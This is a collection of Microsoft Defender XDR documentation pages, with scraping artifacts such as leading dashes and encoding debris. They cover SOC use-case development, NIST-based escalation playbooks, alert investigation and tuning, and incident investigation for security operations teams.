-Security tools are interrelated. Turning on one feature in a security technology or changing a process may in turn break another. For this reason, Microsoft recommends that your SOC team formalize a method for defining and prioritizing use cases. Use cases help define requirements and test processes for SOC operations across various teams. It creates a methodology for capturing metrics to determine if the right roles and mix of tasks are aligned to the right team with the right skill set.
-
-## Develop and formalize use case process
-
-The SOC should define a high-level standard and process for developing use cases, which would be regulated by the SOC Oversight team. The SOC Oversight team should work with your business, IT, legal, HR, and other groups to prioritize use cases for the SOC that will eventually make their way into the SOC team's runbooks and playbooks. Priority of use cases are based on objectives, such as compliance or privacy.
-
-SOC Oversight activities related to use case development include:
--- Requirements-- Staffing or training needs-- Software licenses-- Vendor contracting-- Managing plan-- Maintaining use case registry-- Maintaining/updating templates-
-To facilitate the runbook and playbook creation processes, create a use case decision tree. This figure shows an example.
--
-Once a high-level use case standard has been defined and approved, the next step is to create and test an actual use case. The following sections use anti-phishing and threat and vulnerability scanning scenarios as examples.
-
-## Use case example 1: New phishing variant
-
-The first step in creating a use case is to outline the workflow using a story board. Here's an example of a high-level story board for a new phishing exploit notification to a Threat Intelligence team.
--
-### Invoke the use case workflow for example 1
-
-Once the story board has been approved, the next step is to invoke the use case workflow. Here's an example process for an anti-phishing campaign.
--
-## Use case example 2: Threat and vulnerability scanning
-
-Another scenario where a use case could be used is for threat and vulnerability scanning. In this example, the SOC requires that threats and vulnerabilities be remediated against assets via approved processes that include scanning of assets.
-
-Here's an example high-level storyboard for the Microsoft Defender Vulnerability Management of assets.
--
-### Invoke the use case workflow for example 2
-
-Here's an example process for threat and vulnerability scanning.
--
-### Analyze the use case output and lessons learned
-
-After a use case has been approved and tested, gaps among your security teams should be identified, along with people, processes, and the Microsoft Defender XDR technologies involved. Microsoft Defender XDR technologies should be analyzed to determine if they're capable of achieving desired outcomes. These can be tracked via a checklist or a matrix.
-
-For example, in the anti-phishing scenario example, the SOC teams could have made the discoveries in this table.
-
-|SOC team|Requirement|People to meet requirement|Process to meet requirement|Relevant technology|Gap identified|Use case change log|Exempt (Y/N)|
-|||||||||
-|Threat Intelligence and Analytics team|Data sources are properly feeding the threat intelligence engines.|Threat Intelligence Analyst/Engineer|Data feed requirements established, threat intelligence triggers from approved sources|Microsoft Defender for Identity, Microsoft Defender for Endpoint|Threat Intelligence team didn't use automation script to link Microsoft Defender XDR API with threat intel engines|Add Microsoft Defender XDR as data sources to threat engines <p> Update use case run book|N|
-|Monitoring team|Data sources are properly feeding the monitoring dashboards|Tier 1,2 SOC AnalystΓÇôMonitoring & Alerts|Workflow for reporting Security & Compliance Center Secure Score|[Investigate alerts in Microsoft Defender XDR](investigate-alerts.md) <p> Secure Score monitoring|No mechanism for SOC analysts to report successful new phishing variant detection to improve Secure Score <p> [View email security reports in the Microsoft Defender portal](/microsoft-365/security/office-365-security/reports-email-security)|Add a process for tracking Secure Score improvement to Reporting workflows|N|
-|Engineering and SecOps Team|Change control updates are made in the SOC team runbooks|Tier 2 SOC Engineer|Change Control notification procedure for SOC team runbooks|Approved changes to security devices|Changes to Microsoft Defender XDR connectivity to SOC security technology requires approval|Add Microsoft Defender for Cloud Apps, Defender for Identity, Defender for Endpoint, Security & Compliance Center to SOC runbooks|Y|
----
-Additionally, the SOC teams could have made the discoveries outlined in the table below in regard to the Defender Vulnerability Management scenario outlined above:
-
-|SOC team|Requirement|People to meet requirement|Process to meet requirement|Relevant technology|Gap identified|Use case change log|Exempt (Y/N)|
-|||||||||
-|SOC Oversight|All assets connected to approved networks are identified and categorized|SOC Oversight, BU owners, application owners, IT asset owners, etc.|Centralized asset management system to discover and list asset category and attributes based on risk.|ServiceNow or other assets. <br><br>[Microsoft 365 Device Inventory](/microsoft-365/security/defender-endpoint/device-discovery)|Only 70% of assets have been discovered. Microsoft Defender XDR remediation tracking only effective for known assets|Mature asset lifecycle management services to ensure Microsoft Defender XDR has 100% coverage|N|
-|Engineering & SecOps Teams|High impact and critical vulnerabilities in assets are remediated according to policy|SecOps engineers, SOC analysts: Vulnerability & Compliance, Security Engineering|Defined process for categorizing High Risk and Critical Vulnerabilities|[Microsoft Defender Vulnerability Management Dashboards](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)|Defender for Endpoint has identified high impact, high alert devices with no remediation plan or implementation of Microsoft recommended activity|Add a workflow for notifying asset owners when remediation activity is required within 30 days per policy; Implement a ticketing system to notify asset owners of remediation steps.|N|
-|Monitoring Teams|Threat and vulnerability status is reported via company intranet portal|Tier 2 SOC analyst|Auto-generated reports from Microsoft Defender XDR showing remediation progress of assets|[Investigate alerts in Microsoft Defender XDR](investigate-alerts.md) <p> Secure Score monitoring|No views or dashboard reports being communicated to asset owners regarding threat and vulnerability status of assets.|Create automation script to populate status of high risk and critical asset vulnerability remediation to the organization.|N|
-
-In these example use cases, the testing revealed several gaps in the SOC team's requirements that were established as baselines for the responsibilities of each team. The use case checklist can be as comprehensive as needed to ensure that the SOC team is prepared for the Microsoft Defender XDR integration with new or existing SOC requirements. Since this is an iterative process, the use case development process and the use case output content naturally serve to update and mature the SOC's runbooks with lessons learned.
-
-## Update production runbooks and playbooks
-
-Once use case testing has been remediated for all gaps, the lessons learned and metrics collected in them can be incorporated into your SOC team's production runbooks (operating processes) and playbooks (incident responses and escalation procedures).
-
-Maintenance of the SOC team runbooks and playbooks can be organized in a multitude of ways. Each SOC team may be responsible for their own, or there may be a single centralized version for all teams to share in a central repository. Runbook and playbook management for individual organizations is based on size, skill set, roles, and segregation of duties. Once a runbook has been updated, the playbook update process should follow.
-
-## Use a standard framework for escalation
-
-Playbooks are the steps the SOC teams need to follow when a real event occurs, based on the successful integration and test of the use case. Therefore, it's imperative that the SOC follows a formalized approach to incident response, such as the [NIST Incident Response Standard](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) that has become one of the leading industry standards for incident response.
-
-The NIST four step incident response process includes four phases:
-
-1. Preparation
-2. Detection and analysis
-3. Containment, eradication, and recovery
-4. Post-incident activity
-
-### Example: Tracking preparation phase activity
-
-One of the core foundations of an escalation playbook is to ensure there's little ambiguity as to what each SOC team is supposed to do before, during, and after an event or incident. Therefore, it's good practice to list out step by step instructions.
-
-For example, the Preparation phase could include an if/then or XoR matrix of tasks. In the case of the new phishing variant example use case, such a matrix could look like this:
-
-|Why is Escalation Warranted?|Next Step|
-|||
-|Alert in SOC Monitoring rated as **critical** triggered > **500/hour**|Go to Playbook A, Section 2, Activity 5 (with a link to the playbook section)|
-|eCommerce reported potential DDoS attack|Invoke Playbook B-Section C, Activity 19 (with a link to the playbook section)|
-|Executive reported a suspicious email as spear phishing attempt|Go to Playbook 5, Section 2, Activity 5 (with a link to the playbook section)|
-
-After executing the Preparation phase, organizations should invoke the remaining phases as outlined by NIST:
--- Detection and analysis-- Containment, eradication, and recovery-- Post-incident activity-
-## Next step
-
-[Step 6. Identify SOC maintenance tasks](integrate-microsoft-365-defender-secops-tasks.md)
security Integrate Microsoft 365 Defender Secops https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops.md
- Title: Integrating Microsoft Defender XDR into your security operations
-description: The basics of integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Integrating Microsoft Defender XDR into your security operations
--
-**Applies to:**
-- Microsoft Defender XDR-
-A modern Security Operations Center (SOC) is an intelligence-driven, adaptive organization that embraces threat defense strategy of moving security processes earlier in the deployment process so that security is built in. This means that the traditional assignment of isolated technologies and processes to single security analysts no longer supports the vast increase in data coming in from multiple sources. Security analysts and engineers are being asked to take a more holistic approach and to use shared insights across different platforms and disciplines to take effective action.
-
-For this reason, the deployment and implementation of the Microsoft Defender XDR platform will need careful planning with the SOC team to optimize the day-to-day operations and lifecycle management of the Microsoft Defender XDR service itself. This content explores several concepts on how to operationalize and integrate Microsoft Defender XDR with either new or existing people, processes, and technologies that form the basis for modern security operations.
-
-If you are not already familiar with Microsoft Defender XDR, see these articles:
--- [Get started with Microsoft Defender XDR](get-started.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-
-If your organization has already implemented some aspects of Microsoft Defender XDR, these articles can either affirm or help improve your existing architecture and processes.
-
-> [!NOTE]
-> As a Microsoft partner, Protiviti contributed to and provided material feedback to this article.
-
-## Target audience
-
-This content is designed for the following:
--- DevOps and Security Operations (SecOps) teams-- Security engineering teams-- IT teams-- CISOs and CTOs-- Red, Blue, and Purple Teams-- CSIRT & forensic teams-- Microsoft 365 administrators-
-## Next steps
-
-Use these steps to integrate Microsoft Defender XDR into your SOC.
--- [Step 1. Plan for Microsoft Defender XDR operations readiness](integrate-microsoft-365-defender-secops-plan.md)-- [Step 2. Perform a SOC integration readiness assessment using the Zero Trust Framework](integrate-microsoft-365-defender-secops-readiness.md)-- [Step 3. Plan for Microsoft Defender XDR integration with your SOC catalog of services](integrate-microsoft-365-defender-secops-services.md)-- [Step 4. Define Microsoft Defender XDR roles, responsibilities, and oversight](integrate-microsoft-365-defender-secops-roles.md)-- [Step 5. Develop and test use cases](integrate-microsoft-365-defender-secops-use-cases.md)-- [Step 6. Identify SOC maintenance tasks](integrate-microsoft-365-defender-secops-tasks.md)---
security Investigate Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/investigate-alerts.md
- Title: Investigate alerts in Microsoft Defender XDR
-description: Investigate alerts seen across devices, users, and mailboxes.
-keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier1
--
- - MOE150
- - met150
Previously updated : 12/18/2023--
-# Investigate alerts in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!NOTE]
-> This article describes security alerts in Microsoft Defender XDR. However, you can use activity alerts to send email notifications to yourself or other admins when users perform specific activities in Microsoft 365. For more information, see [Create activity alerts - Microsoft Purview | Microsoft Docs](../../compliance/create-activity-alerts.md).
-
-Alerts are the basis of all incidents and indicate the occurrence of malicious or suspicious events in your environment. Alerts are typically part of a broader attack and provide clues about an incident.
-
-In Microsoft Defender XDR, related alerts are aggregated together to form [incidents](incidents-overview.md). Incidents will always provide the broader context of an attack, however, analyzing alerts can be valuable when deeper analysis is required.
-
-The **Alerts queue** shows the current set of alerts. You get to the alerts queue from **Incidents & alerts > Alerts** on the quick launch of the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139).
--
-Alerts from different Microsoft security solutions like Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender XDR appear here.
-
-By default, the alerts queue in the Microsoft Defender portal displays the new and in progress alerts from the last 30 days. The most recent alert is at the top of the list so you can see it first.
-
-From the default alerts queue, you can select **Filter** to see a **Filter** pane, from which you can specify a subset of the alerts. Here's an example.
--
-You can filter alerts according to these criteria:
--- Severity-- Status-- Service sources-- Entities (the impacted assets)-- Automated investigation state-
-## Required roles for Defender for Office 365 alerts
-
-You'll need to have any of the following roles to access Microsoft Defender for Office 365 alerts:
--- For Microsoft Entra global roles:
- - Global administrator
- - Security administrator
- - Security Operator
- - Global Reader
- - Security Reader
--- Office 365 Security & Compliance Role Groups
- - Compliance Administrator
- - Organization Management
--- A [custom role](custom-roles.md)-
-## Analyze an alert
-
-To see the main alert page, select the name of the alert. Here's an example.
--
-You can also select the **Open the main alert page** action from the **Manage alert** pane.
-
-An alert page is composed of these sections:
--- Alert story, which is the chain of events and alerts related to this alert in chronological order-- Summary details-
-Throughout an alert page, you can select the ellipses (**...**) beside any entity to see available actions, such as linking the alert to another incident. The list of available actions depends on the type of alert.
-
-### Alert sources
-
-Microsoft Defender XDR alerts may come from solutions like Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, the app governance add-on for Microsoft Defender for Cloud Apps, Microsoft Entra ID Protection, and Microsoft Data Loss Prevention. You may notice alerts with prepended characters in the alert. The following table provides guidance to help you understand the mapping of alert sources based on the prepended character on the alert.
-
-> [!NOTE]
->
-> - The prepended GUIDs are specific only to unified experiences such as unified alerts queue, unified alerts page, unified investigation, and unified incident.
-> - The prepended character does not change the GUID of the alert. The only change to the GUID is the prepended component.
-
-| Alert source | Prepended character |
-| :|: |
-| Microsoft Defender XDR | `ra` <br> `ta` for ThreatExperts <br> `ea` for DetectionSource = DetectionSource.CustomDetection |
-| Microsoft Defender for Office 365 | `fa{GUID}` <br> Example: `fa123a456b-c789-1d2e-12f1g33h445h6i` |
-| Microsoft Defender for Endpoint | `da` or `ed` for custom detection alerts <br> |
-| Microsoft Defender for Identity | `aa{GUID}` <br> Example: `aa123a456b-c789-1d2e-12f1g33h445h6i` |
-| Microsoft Defender for Cloud Apps |`ca{GUID}` <br> Example: `ca123a456b-c789-1d2e-12f1g33h445h6i` |
-| Microsoft Entra ID Protection | `ad` |
-| App Governance | `ma` |
-| Microsoft Data Loss Prevention | `dl` |
-
-<a name='configure-aad-ip-alert-service'></a>
-
-### Configure Microsoft Entra IP alert service
-
-1. Go to the Microsoft Defender portal ([security.microsoft.com](https://security.microsoft.com)), select **Settings** > **Microsoft Defender XDR**.
-
-2. From the list, select **Alert service settings**, and then configure your **Microsoft Entra ID Protection** alert service.
-
- :::image type="content" source="../../media/investigate-alerts/alerts-ss-entra-alert.png" alt-text="Screenshot of Microsoft Entra ID Protection alerts setting in the Microsoft Defender portal." lightbox="../../media/investigate-alerts/alerts-ss-entra-alert.png":::
-
-By default, only the most relevant alerts for the security operation center are enabled. If you want to get all Microsoft Entra IP risk detections, you can change it in the **Alert service settings** section.
-
-You can also access **Alert service settings** directly from the **Incidents** page in the Microsoft Defender portal.
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-### Analyze affected assets
-
-The **Actions taken** section has a list of impacted assets, such as mailboxes, devices, and users affected by this alert.
-
-You can also select **View in action center** to view the **History** tab of the **Action center** in the Microsoft Defender portal.
-
-### Trace an alert's role in the alert story
-
-The alert story displays all assets or entities related to the alert in a process tree view. The alert in the title is the one in focus when you first land on your selected alert's page. Assets in the alert story are expandable and clickable. They provide additional information and expedite your response by allowing you to take action right in the context of the alert page.
-
-> [!NOTE]
-> The alert story section may contain more than one alert, with additional alerts related to the same execution tree appearing before or after the alert you've selected.
-
-### View more alert information on the details page
-
-The details page shows the details of the selected alert, with details and actions related to it. If you select any of the affected assets or entities in the alert story, the details page changes to provide contextual information and actions for the selected object.
-
-Once you've selected an entity of interest, the details page changes to display information about the selected entity type, historic information when it's available, and options to take action on this entity directly from the alert page.
-
-## Manage alerts
-
-To manage an alert, select **Manage alert** in the summary details section of the alert page. For a single alert, here's an example of the **Manage alert** pane.
--
-The **Manage alert** pane allows you to view or specify:
--- The alert status (New, Resolved, In progress).-- The user account that has been assigned the alert.-- The alert's classification:
- - **Not Set** (default).
- - **True positive** with a type of threat. Use this classification for alerts that accurately indicate a real threat. Specifying this threat type alerts your security team see threat patterns and act to defend your organization from them.
- - **Informational, expected activity** with a type of activity. Use this option for alerts that are technically accurate, but represent normal behavior or simulated threat activity. You generally want to ignore these alerts but expect them for similar activities in the future where the activities are triggered by actual attackers or malware. Use the options in this category to classify alerts for security tests, red team activity, and expected unusual behavior from trusted apps and users.
- - **False positive** for types of alerts that were created even when there's no malicious activity or for a false alarm. Use the options in this category to classify alerts that are mistakenly identified as normal events or activities as malicious or suspicious. Unlike alerts for 'Informational, expected activity', which can also be useful for catching real threats, you generally don't want to see these alerts again. Classifying alerts as false positive helps Microsoft Defender XDR improve its detection quality.
-- A comment on the alert.-
-> [!NOTE]
-> Around August 29th, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.
-
-> [!NOTE]
-> One way of managing alerts it through the use of tags. The tagging capability for Microsoft Defender for Office 365 is incrementally being rolled out and is currently in preview.
->
-> Currently, modified tag names are only applied to alerts created *after* the update. Alerts that were generated before the modification will not reflect the updated tag name.
-
-To manage a *set of alerts similar to a specific alert*, select **View similar alerts** in the **INSIGHT** box in the summary details section of the alert page.
--
-From the **Manage alerts** pane, you can then classify all of the related alerts at the same time. Here's an example.
--
-If similar alerts were already classified in the past, you can save time by using Microsoft Defender XDR recommendations to learn how the other alerts were resolved. From the summary details section, select **Recommendations**.
--
-The **Recommendations** tab provides next-step actions and advice for investigation, remediation, and prevention. Here's an example.
--
-## Tune an alert
-
-As a security operations center (SOC) analyst, one of the top issues is triaging the sheer number of alerts that are triggered daily. An analyst's time is valuable, wanting to focus only on high severity and high priority alerts. Meanwhile, analysts are also required to triage and resolve lower priority alerts, which tends to be a manual process.
-
-Alert tuning provides the ability to tune and manage alerts in advance. This streamlines the alert queue and saves triage time by hiding or resolving alerts automatically, each time a certain expected organizational behavior occurs, and rule conditions are met.
-
-You can create rule conditions based on 'evidence types' such as files, processes, scheduled tasks, and many other evidence types that trigger the alert. After creating the rule, you can apply the rule on the selected alert or any alert type that meets the rule conditions to tune the alert.
-
-In addition, the feature also covers alerts coming from various Microsoft Defender XDR service sources. The alert tuning feature in public preview is getting alerts from workloads like Defender for Endpoint, Defender for Office 365, Defender for Identity, Defender for Cloud Apps, Microsoft Entra ID Protection (Microsoft Entra IP), and others, if these sources are available on your platform and plan. Previously, the alert tuning capability only captured alerts from the Defender for Endpoint workload.
-
-> [!NOTE]
-> We recommend using alert tuning, previously known as **alert suppression**, with caution. In certain situations, a known internal business application or security tests trigger an expected activity and you don't want to see these alerts. So, you can create a rule to tune these alert types.
-
-### Create rule conditions to tune alerts
-
-There are two ways to tune an alert in Microsoft Defender XDR. To tune an alert from the **Settings** page:
-
-1. Go to Settings. On the left pane, go to **Rules** and select **Alert tuning**.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-settings.png" lightbox="../../media/investigate-alerts/alert-tuning-settings.png" alt-text="Screenshot of Alert tuning option in Microsoft Defender XDR's Settings page.":::
-
- Select **Add new rule** to tune a new alert. You can also edit an existing rule in this view by selecting a rule from the list.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-add-new.png" lightbox="../../media/investigate-alerts/alert-tuning-add-new.png" alt-text="Screenshot of adding new rules in the Alert tuning page.":::
-
-2. In the **Tune alert** pane, you can select service sources where the rule applies in the dropdown menu under **Service sources**.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-select-service.png" lightbox="../../media/investigate-alerts/alert-tuning-select-service.png" alt-text="Screenshot of service source dropdown menu in Tune an alert page.":::
-
- > [!NOTE]
- > Only services that the user has permission to are shown.
-
-3. Add indicators of compromise (IOCs) that triggers the alert under the **IOCs** section. You can add a condition to stop the alert when triggered by a specific IOC or by any IOC added in the alert.
-
- IOCs are indicators such as files, processes, scheduled tasks, and other evidence types that trigger the alert.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-choose-ioc2.png" lightbox="../../media/investigate-alerts/alert-tuning-choose-ioc2.png" alt-text="Screenshot of the IOC menu in Tune an alert page.":::
-
- To set multiple rule conditions, use **AND**, **OR**, and grouping options to build relationship between these multiple 'evidence types' that cause the alert.
-
- 1. For example, select the triggering evidence **Entity Role: Trigger**, **equals**, and **any** to stop the alert when triggered by any IOC added in the alert. All the properties of this 'evidence' will auto populate as a new subgroup in the respective fields below.
-
- > [!NOTE]
- > Condition values are not case sensitive.
-
- 2. You can edit and/or delete properties of this 'evidence' depending on your requirement (using wildcards, when supported).
-
- 3. Other than files and processes, AntiMalware Scan Interface (AMSI) script, Windows Management Instrumentation (WMI) event, and scheduled tasks are some of the newly added evidence types that you can select from the evidence types drop-down list.
-
- 4. To add another IOC, click **Add filter**.
- > [!NOTE]
- > Adding at least one IOC to the rule condition is required to tune any alert type.
-
-4. In the **Action** section, take the appropriate action of either **Hide alert** or **Resolve alert**.
-
- Enter **Name**, **Description**, and click **Save**.
-
- > [!NOTE]
- > The **alert title (Name)** is based on the **alert type (IoaDefinitionId)**, which decides the alert title. Two alerts that have the same alert type can change to a different alert title.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-choose-action2.png" lightbox="../../media/investigate-alerts/alert-tuning-choose-action2.png" alt-text="Screenshot of the Action menu in the Tune an alert page.":::
-
-To tune an alert from the **Alerts** page:
-
-1. Select an alert in the **Alerts** page under **Incidents and alerts**. Alternatively, you can select an alert when reviewing incident details in the Incident page.
-
- You can tune an alert through the **Tune alert** pane that automatically opens on the right side of the alert details page.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-tune-pane2.png" lightbox="../../media/investigate-alerts/alert-tuning-tune-pane2.png" alt-text="Screenshot of Tune an alert pane within an Alert page.":::
-
-2. Select the conditions where the alert applies in the **Alert types** section. Select **Only this alert type** to apply the rule on the selected alert.
-
- However, to apply the rule on any alert type that meets rule conditions select **Any alert type based on IOC conditions**.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-alert-types.png" lightbox="../../media/investigate-alerts/alert-tuning-alert-types.png" alt-text="Screenshot of Tune an alert pane highlighting the Alert types section.":::
-
-3. Filling out the **Scope** section is required if the alert tuning is Defender for Endpoint-specific. Select whether the rule applies to all devices in the organization or for a specific device.
-
- > [!NOTE]
- > Applying the rule to all organization requires an administrative role permission.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-scope.png" lightbox="../../media/investigate-alerts/alert-tuning-scope.png" alt-text="Screenshot of Tune an alert pane highlighting the Scope section.":::
-
-4. Add conditions in the **Conditions** section to stop the alert when triggered by a specific IOC or by any IOC added in the alert. You can select a specific device, multiple devices, device groups, the entire organization or by user in this section.
-
- > [!NOTE]
- > You must have Admin permission when the **Scope** is set only for User. Admin permission is not required when the **Scope** is set for **User** together with **Device, Device groups**.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-conditions.png" lightbox="../../media/investigate-alerts/alert-tuning-conditions.png" alt-text="Screenshot of Tune an alert pane highlighting the Conditions section.":::
-
-5. Add IOCs where the rule applies in the **IOCs** section. You can select **Any IOC** to stop the alert no matter what 'evidence' has caused the alert.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-any-ioc.png" lightbox="../../media/investigate-alerts/alert-tuning-any-ioc.png" alt-text="Screenshot of Tune an alert pane highlighting the IOCs section.":::
-
-6. Alternatively, you can select **Auto fill all alert 7 related IOCs** in the **IOCs** section to add all alert-related evidence types and their properties at once in the **Conditions** section.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-auto-fill-conditions.png" alt-text="Screenshot of auto fill all alert related IOCs." lightbox="../../media/investigate-alerts/alert-tuning-auto-fill-conditions.png":::
-
-7. In the **Action** section, take the appropriate action of either **Hide alert** or **Resolve alert**.
-
- Enter **Name**, **Comment**, and click **Save**.
-
- :::image type="content" source="../../media/investigate-alerts/alert-tuning-tune-pane-action.png" alt-text="Screenshot of Action section in the Tune alert pane." lightbox="../../media/investigate-alerts/alert-tuning-tune-pane-action.png":::
-
-8. **Prevent the IOCs from being blocked in the future:**
-
- Once you save the alert tuning rule, in the **Successful rule creation** page that appears, you can add the selected IOCs as indicators to the "allow list" and prevent them from being blocked in the future.
-
- All alert-related IOCs will be shown in the list.
-
- IOCs that were selected in the suppression conditions will be selected by default.
-
- 1. For example, you can add files to be allowed to the **Select evidence (IOC) to allow**. By default the file that triggered the alert is selected.
- 2. Enter the scope to the **Select scope to apply to**. By default scope for the related alert is selected.
- 3. Click **Save**. Now the file is not blocked as it is in the allow list.
-
-9. The new alert tuning functionality is available by default.
-
- However, you can switch back to the previous experience in Microsoft Defender portal by navigating to **Settings > Microsoft Defender XDR > Rules > Alert tuning**, then switch off the **New tuning rules creation enabled** toggle.
-
- > [!NOTE]
- > Soon, only the new alert tuning experience will be available. You will not be able to go back to the previous experience.
-
-10. **Edit existing rules:**
-
- You can always add or change rule conditions and scope of new or existing rules in the Microsoft Defender portal, by selecting the relevant rule and clicking **Edit rule**.
-
- To edit existing rules, ensure that the **New alert tuning rules creation enabled** toggle is enabled.
-
-## Resolve an alert
-
-Once you're done analyzing an alert and it can be resolved, go to the **Manage alert** pane for the alert or similar alerts and mark the status as **Resolved** and then classify it as a **True positive** with a type of threat, an **Informational, expected activity** with a type of activity, or a **False positive**.
-
-Classifying alerts helps Microsoft Defender XDR improve its detection quality.
-
-## Use Power Automate to triage alerts
-
-Modern security operations (SecOps) teams need automation to work effectively. To focus on hunting and investigating real threats, SecOps teams use Power Automate to triage through the list of alerts and eliminate the ones that aren't threats.
-
-### Criteria for resolving alerts
--- User has Out-of-office message turned on-- User isn't tagged as high risk-
-If both are true, SecOps marks the alert as legitimate travel and resolves it. A notification is posted in Microsoft Teams after the alert is resolved.
-
-### Connect Power Automate to Microsoft Defender for Cloud Apps
-
-To create the automation, you'll need an API token before you can connect Power Automate to Microsoft Defender for Cloud Apps.
-
-1. Open [Microsoft Defender](https://security.microsoft.com/) and select **Settings** > **Cloud Apps** > **API token**, and then select **Add token** in the **API tokens** tab.
-
-2. Provide a name for your token, and then select **Generate**. Save the token as you'll need it later.
-
-### Create an automated flow
-
-Watch this short video to learn how automation works efficiently to create a smooth workflow and how to connect Power Automate to Defender for Cloud Apps.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWFIRn]
-
-## Next steps
-
-As needed for in-process incidents, continue your [investigation](investigate-incidents.md).
-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Manage incidents](manage-incidents.md)-- [Investigate incidents](investigate-incidents.md)-- [Investigate data loss prevention alerts in Defender](dlp-investigate-alerts-defender.md)-- [Microsoft Entra ID Protection](/azure/active-directory/identity-protection/overview-identity-protection)-
security Investigate Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/investigate-incidents.md
- Title: Investigate incidents in Microsoft Defender XDR
-description: Investigate incidents related to devices, users, and mailboxes.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 12/04/2023--
-# Investigate incidents in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-Microsoft Defender XDR aggregates all related alerts, assets, investigations, and evidence from across your devices, users, and mailboxes into an incident to give you a comprehensive look into the entire breadth of an attack.
-
-Within an incident, you analyze the alerts that affect your network, understand what they mean, and collate the evidence so that you can devise an effective remediation plan.
-
-## Initial investigation
-
-Before diving into the details, take a look at the properties and the entire attack story of the incident.
-
-You can start by selecting the incident from the check mark column. Here's an example.
--
-When you do, a summary pane opens with key information about the incident, such as severity, to whom it is assigned, and the [MITRE ATT&CK&trade;](https://attack.mitre.org/) categories for the incident. Here's an example.
--
-From here, you can select **Open incident page**. This opens the main page for the incident where you'll find the full attack story information and tabs for alerts, devices, users, investigations, and evidence.
-
-You can also open the main page for an incident by selecting the incident name from the incident queue.
-
-## Attack story
-
-Attack stories help you to quickly review, investigate, and remediate attacks while viewing the full story of the attack on the same tab. It also allows you to review the entity details and take remediation actions, such as deleting a file or isolating a device without losing context.
-
-The attack story is briefly described in the following video.
- > [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RW129Jc]
-
-Within the attack story you can find the alert page and the incident graph.
-
-The incident alert page has these sections:
--- Alert story, which includes:-
- - What happened
- - Actions taken
- - Related events
--- Alert properties in the right pane (state, details, description, and others)-
-Note that not every alert will have all of the listed subsections in the **Alert story** section.
-
-The graph shows the full scope of the attack, how the attack spread through your network over time, where it started, and how far the attacker went. It connects the different suspicious entities that are part of the attack with their related assets such as users, devices, and mailboxes.
-
-From the graph, you can:
--- Play the alerts and the nodes on the graph as they occurred over time to understand the chronology of the attack.
-
- :::image type="content" source="../../media/investigate-incidents/play-alert-attack-story.gif" alt-text="Screenshot that shows playing of the alerts and nodes on the attack story graph page.":::
--- Open an entity pane, allowing you to review the entity details and act on remediation actions, such as deleting a file or isolating a device.-
- :::image type="content" source="../../media/investigate-incidents/review-entity-details-attack-story.gif" alt-text="Screenshot that shows the review of the entity details on the attack story graph page.":::
--- Highlight the alerts based on the entity to which they are related.--- Hunt for entity information of a device, file, IP address, or URL.-
-The *go hunt* option takes advantage of the [advanced hunting](advanced-hunting-go-hunt.md) feature to find relevant information about an entity. The *go hunt* query checks relevant schema tables for any events or alerts involving the specific entity you're investigating. You can select any of the options to find relevant information about the entity:
-
- - See all available queries ΓÇô the option returns all available queries for the entity type you're investigating.
- - All Activity ΓÇô the query returns all activities associated with an entity, providing you with a comprehensive view of the incident's context.
- - Related Alerts ΓÇô the query searches for and returns all security alerts involving a specific entity, ensuring you don't miss any information.
--
-The resulting logs or alerts can be linked to an incident by selecting a results and then selecting *Link to incident*.
--
-## Summary
-
-Use the **Summary** page to assess the relative importance of the incident and quickly access the associated alerts and impacted entities. The **Summary** page gives you a snapshot glance at the top things to notice about the incident.
--
-Information is organized in these sections.
-
-| Section | Description |
-|:-|:--|
-| Alerts and categories | A visual and numeric view of how advanced the attack has progressed against the kill chain. As with other Microsoft security products, Microsoft Defender XDR is aligned to the [MITRE ATT&CK&trade;](https://attack.mitre.org/) framework. The alerts timeline shows the chronological order in which the alerts occurred and for each, their status and name. |
-| Scope | Displays the number of impacted devices, users, and mailboxes and lists the entities in order of risk level and investigation priority. |
-| Evidence | Displays the number of entities affected by the incident. |
-| Incident information | Displays the properties of the incident, such as tags, status, and severity. |
-|||
-
-## Alerts
-
-On the **Alerts** tab, you can view the alert queue for alerts related to the incident and other information about them such as:
